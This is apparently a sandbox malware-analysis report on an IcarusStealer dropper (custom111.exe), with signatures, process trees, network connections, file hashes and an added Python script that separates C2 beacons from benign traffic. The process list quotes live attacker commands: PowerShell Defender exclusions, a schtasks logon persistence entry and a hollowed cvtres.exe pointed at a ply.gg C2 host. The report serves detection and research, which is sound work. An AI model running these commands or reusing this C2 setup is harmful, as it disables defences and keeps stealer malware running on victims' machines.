Analysis Overview
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Threat Level: Known bad
The file custom111.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Modifies registry class
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Analysis: static1
Detonation Overview
Reported
2024-03-09 23:11
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 23:11
Reported
2024-03-09 23:15
Platform
win7-20240221-en
Max time kernel
139s
Max time network
166s
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom111.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom111.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2648 set thread context of 584 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = … | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\custom111.exe
"C:\Users\Admin\AppData\Local\Temp\custom111.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BF1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA4A75A4388864E329B20866A068E1E2.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB77D.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| N/A | 127.0.0.1:49221 | N/A | tcp |
| N/A | 127.0.0.1:49223 | N/A | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49261 | N/A | tcp |
| N/A | 127.0.0.1:49263 | N/A | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
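Read together, the table holds three kinds of traffic: the HTTPS session to keyauth.win together with the HTTP fetches from apps.identrust.com and x2.c.lencr.org (IdenTrust and Let's Encrypt chain hosts, contacted while the TLS chain is validated); one-off connections to raw.githubusercontent.com and the external-IP lookup at ipinfo.io; and nineteen connections to 147.185.221.17:26501, the playit.gg relay (ply.gg) that the hollowed cvtres.exe was given on its command line, plus one to a second relay, operating-noble.gl.at.ply.gg:52033. Chain validation is also the usual cause of the "Modifies system certificate store" signature: Windows writes a root it needs into AuthRoot on demand, so that registry key on its own is not an indicator. The parser below is an added example, not part of the report; it consumes rows in the table's own layout (including the loopback rows whose Domain cell is empty or N/A), counts connections per endpoint and labels each one. The label text and the min_hits threshold are my choices.

```python
"""Endpoint summary over the behavioral1 Network table.

Added example, not part of the report: parses rows in the table's own
'| Country | Destination | Domain | Proto |' layout, counts connections per
endpoint and labels each one so the relay C2 is separated from the TLS
chain fetches and the one-off downloads. Labels and threshold are my choices.
"""
from collections import Counter

# Constructed sample: a trimmed copy of the behavioral1 Network table. The
# loopback rows appear in both shapes found on the page (empty or N/A Domain).
SAMPLE_TABLE = """
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| N/A | 127.0.0.1:49221 | tcp | |
| N/A | 127.0.0.1:49223 | N/A | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
"""

# Domain suffix -> label. First match wins.
LABELS = (
    (("ply.gg",), "tunnel relay (playit.gg), used as C2"),
    (("raw.githubusercontent.com",), "hosting service (payload download)"),
    (("ipinfo.io",), "external IP lookup"),
    (("lencr.org", "identrust.com"), "PKI noise (Let's Encrypt/IdenTrust chain fetch)"),
)


def parse_rows(text):
    """Yield (ip, port, domain, proto) per table row. A row with no Domain
    cell has its protocol shifted one column left; 'N/A' means no domain."""
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 4 or ":" not in cells[1]:
            continue  # header, blank or malformed row
        ip, port = cells[1].rsplit(":", 1)
        domain, proto = (cells[2], cells[3]) if cells[3] else ("", cells[2])
        if domain.upper() == "N/A":
            domain = ""
        yield ip, int(port), domain, proto.lower()


def label(ip, port, domain):
    if ip.startswith("127."):
        return "loopback"
    if port == 53:
        return "dns"
    for suffixes, name in LABELS:
        if any(domain == s or domain.endswith("." + s) for s in suffixes):
            return name
    return "other"


def summarize(text):
    """{(ip, port, domain): (connection count, label)} for TCP flows,
    most-contacted endpoint first."""
    counts = Counter((ip, port, domain)
                     for ip, port, domain, proto in parse_rows(text) if proto == "tcp")
    return {key: (n, label(*key)) for key, n in counts.most_common()}


def beacons(text, min_hits=3):
    """Endpoints contacted at least min_hits times. Repeated connects to one
    ip:port inside a short trace are the implant reconnecting, not a download."""
    return [key for key, (n, kind) in summarize(text).items()
            if n >= min_hits and kind not in ("loopback", "dns")]


if __name__ == "__main__":
    for (ip, port, domain), (n, kind) in summarize(SAMPLE_TABLE).items():
        print(f"{n:3d}  {ip}:{port:<6} {domain or '-':30} {kind}")
    print("beacons:", beacons(SAMPLE_TABLE))
```

On the trimmed sample only the case-shield relay crosses the threshold; keyauth.win is contacted twice (a licensing/auth check, then the chain fetches, then the session resumes), which is why the threshold matters rather than counting any repeat as C2.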
Files
\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 35aacbff43ce73ac748965648fb212e7 |
| SHA1 | df644ab54ed3964eacad3582d1d1ccc2c7c69b53 |
| SHA256 | be456f95a11dcaac58af77ed485750cdddcf441316bb9115ed3d5a907d74b428 |
| SHA512 | 77a45684c805a3ba4f29aae7485675952525f3e24da4be6d6acdf5031ac65509c5c71489827229632ed3ab3aea66de3b278da21cdd36992887029b0fb77ca876 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3fd4631f10c52fbf309d12f81fc774cd |
| SHA1 | c8bc6e2932f6f3acab757f9c99aac2937ef7df2d |
| SHA256 | fa200ad81e353e08cde26160a4274ba6155f6a1099e3d067e017e6d33c97690d |
| SHA512 | e18d36e23b47091cb2c68bd001ce780d276d7916c1f0e363322cfd267aadedc9403d09e7d014f39e28d912f48c576e57ad95b3e631121556b0df9987a9d20cfd |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 40c529a22af30de6652eb04416778890 |
| SHA1 | ba07f5d22bea758f7a4dd2b030a1af0ae4bee436 |
| SHA256 | 4752ed84c5b34e10b179429d480637e65e70ee4d2e066c7d1493dba2ad7272dd |
| SHA512 | 9ef7f8f73e7425c948e9b65c02daf70a9c3bc92e5a4be7d9c317657125ea9e132390cb23d3841578bd31b3440365b23bf012a40600f5599bb6ebe8a446049a38 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | b9626891321e65693c80d0b157f10909 |
| SHA1 | 6e58399bc4f9c59433202d236cae32242d125604 |
| SHA256 | 61934ac3ebc67a45655fc1244cae901603429a8b6c351af12db56c7c863f054a |
| SHA512 | 5be22ab017db28f0f84097c82a2f53b4b85f154f2cbacf231bedaeb515acfb50101287762a479885a508444388838ab290d9ab07ff8781e36882aa44172c3592 |
\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | c46cd6f62175b7ea609b788edd41daa9 |
| SHA1 | 1ec4b6df279bd83fe25da8d6ad1d802dbb888079 |
| SHA256 | 2488f804e833a5e96425fbb1c2472eaa8f8d2b9ae452bf7aa04719f882579ffd |
| SHA512 | abf67169f116051de078d61b7d194f6c69188fc0d8e29bd228448f3788a122031cdd0a3bc6791efbd17a8f03459dbbd5bf3dc6a4b3529cece3e24ba27384e19d |
\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 8155b5412dd1d6fee09c7e0dccccf674 |
| SHA1 | 9fb57439e5bd9c02cfbe1a87c44a1a6bd316ad9a |
| SHA256 | 6223c85908acbb13b710d4cfa9f349887c93986b2e600c2575cf29ffbf780593 |
| SHA512 | 14b09dab7264848d3dfc0c33db69600b0e626ea68e99b409de987e1532af38d6f3b35e62131e535026479a6bb338b96d4a48541a6c42f29c892cf55253ae47d3 |
\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
memory/2496-20-0x0000000002AF0000-0x0000000002F2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ceb8c3c0f2249f05f3df8f88d46ae743 |
| SHA1 | 651675ba157c085ce64aa5bb2abbfd6f5efc75c6 |
| SHA256 | a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778 |
| SHA512 | 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a |
memory/2508-25-0x000000013F1B0000-0x000000013F5EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 46040b3f061347eb5b8527a7bbc9a5e9 |
| SHA1 | 3b55c773e34efd03e5558a60faa4c74b53fc6da9 |
| SHA256 | fc5c4e248707860f8e1443eb70ff6ca97f58cdc9f7fee326b20361e372295cb5 |
| SHA512 | 079473e26d25a2356f6cb22b5073f419805532011cca7fcf40666ec29b1204226c6a3b9d03aabaa4f3ed5c57a1864402bc99fc9efe7e1e4a3c1257c6feec17d7 |
memory/2648-28-0x0000000000C20000-0x0000000000CA2000-memory.dmp
memory/2644-31-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/2644-30-0x0000000001310000-0x0000000001950000-memory.dmp
memory/2648-29-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/2648-32-0x0000000004D70000-0x0000000004DB0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.cmdline
| MD5 | af186b32f809647fab5afc91797923dd |
| SHA1 | c9120467f60a618ed8e5dff002a7eff2cdd12ef8 |
| SHA256 | e2e3fc8cbca3830077ea8990351d69e412398c053aea2948f4ccba288268ef8f |
| SHA512 | 9112963501319a27d10da72a98a5507b22b8037d0bd269b5d5b3d58eb2aee915e22710277a28a28dca2a5dfac469851c1a3084a8ca6e95adb4fa9f9d5feaeea3 |
\??\c:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCA4A75A4388864E329B20866A068E1E2.TMP
| MD5 | e9144225655a1177485a6238f397718e |
| SHA1 | 0618d989814312c38b8005fc469222f891470642 |
| SHA256 | f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d |
| SHA512 | 392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4 |
C:\Users\Admin\AppData\Local\Temp\RES9BF1.tmp
| MD5 | 452afe7f7c5d533da7a89b7718c8f7d4 |
| SHA1 | 4443fa6160ae272bb372f006d15cf2018c275e2e |
| SHA256 | a17b9030f29f97f7028e494559e8be0e6b4682bb28ad3e2c1a278b63c46ddee6 |
| SHA512 | a885b467f58d4584c5fa1c0cdb9d4d220daf3a0e54d965296d287bd8ede7d357dfc8c972231e0592add230dd7f85361f34e7e4dacd68ae9e8a4f2989963407e0 |
memory/584-45-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-47-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-51-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-49-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-53-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/584-54-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-56-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-58-0x0000000000400000-0x0000000000424000-memory.dmp
memory/584-59-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/584-60-0x0000000004A00000-0x0000000004A40000-memory.dmp
memory/2508-62-0x000000013F1B0000-0x000000013F5EC000-memory.dmp
memory/2648-61-0x0000000074840000-0x0000000074F2E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8efb09602ffe759f55fde01c907ad5b1 |
| SHA1 | ef4cf61196dad051b36af62304336e98d3014490 |
| SHA256 | 43686d3cf96e0bd908b185cee7ca005ed84cccb6dff460d0b3b3d62446e62923 |
| SHA512 | bec1fe03514dc57016ecb0e1346e050226fa63c54cdfb9211d73d60922de4244aa9cb59092372936763d8696eb26b3da0833e883b6938f3ba6eeb620c9943dac |
memory/2644-70-0x0000000000F50000-0x0000000000F90000-memory.dmp
memory/1456-71-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/2724-72-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/2724-73-0x0000000002210000-0x0000000002250000-memory.dmp
memory/1456-74-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/1456-76-0x0000000000470000-0x00000000004B0000-memory.dmp
memory/2724-75-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/1456-79-0x0000000000470000-0x00000000004B0000-memory.dmp
memory/2644-80-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/1784-81-0x0000000003FE0000-0x0000000003FE1000-memory.dmp
memory/1456-93-0x000000006FB50000-0x00000000700FB000-memory.dmp
memory/2724-92-0x000000006FB50000-0x00000000700FB000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | e83215165939567f1ee561e8e54790c7 |
| SHA1 | dfa905ca145188a32525c1df68b6a2336aaecf30 |
| SHA256 | ce5d4d869c07e41ee190d929d144625b1bac3b080271d9ed91177a9c8949446f |
| SHA512 | 838cd1548883c7dffad0507e9efbe1f2457c7c17ecbc0d7933616ecda26ddb659d93bdd77a47556d91174a9e3244da5ae0080beda589f126baa507acf5cc1388 |
C:\Users\Admin\AppData\Local\Temp\tmpB77D.tmp.bat
| MD5 | 4d9ac8e3fb2d62aca415e1c72b5d4218 |
| SHA1 | 0417b62d441182f03f6ecfe31068571325a6fd3d |
| SHA256 | e9f620eb9a43958a1507ee79eef85c7a909aaf0a862644df2168cc693f1aaa31 |
| SHA512 | d019114d3eae5a4a56982de82281c489fd355c0243d7cc281195e03fbab022acc516c47d038af18fddb43ac0b7c89dc86e80a2f189f7945c9eceff8fe5b0b018 |
memory/2644-94-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/584-96-0x0000000074840000-0x0000000074F2E000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | 69766462ca23c47016ea68ca62b33a75 |
| SHA1 | fe44d459445b082804aa33bac32b5ad710f84e1a |
| SHA256 | d02d7a0e8fa78c73e694d0cc6b863e313387124ebf7fe120402d882aa8cdd449 |
| SHA512 | 7b721a90c026d120838f2e8a855280054b34e591195c8d7293f2a82f16bf5c2cb3d50dbb41c599e1a36a58e04d400472e0840fdaa80b108b149b1e1ed630b469 |
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | eca707459e723fc7a27e8a6881a0138b |
| SHA1 | 557c262cf7f08b670a87e36f89003c2e2efbf6dd |
| SHA256 | 98f612596111bd83389be63bd0387ecf1210a13bd7be036ef2cf11d1c4473a16 |
| SHA512 | 425842b40b321cd099dec0ba2a60d051b817c511df1f2cd4d264df6c5e8ee217a10f3e481fa2a36ca1e94d22c49d98884853022e8c348b20ed64c6c9a845628d |
\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | f1f4f0ebd555a222a09aec7bed2ba78a |
| SHA1 | 39e5e37bdbd640aff7a74e8930cb9e6f810007df |
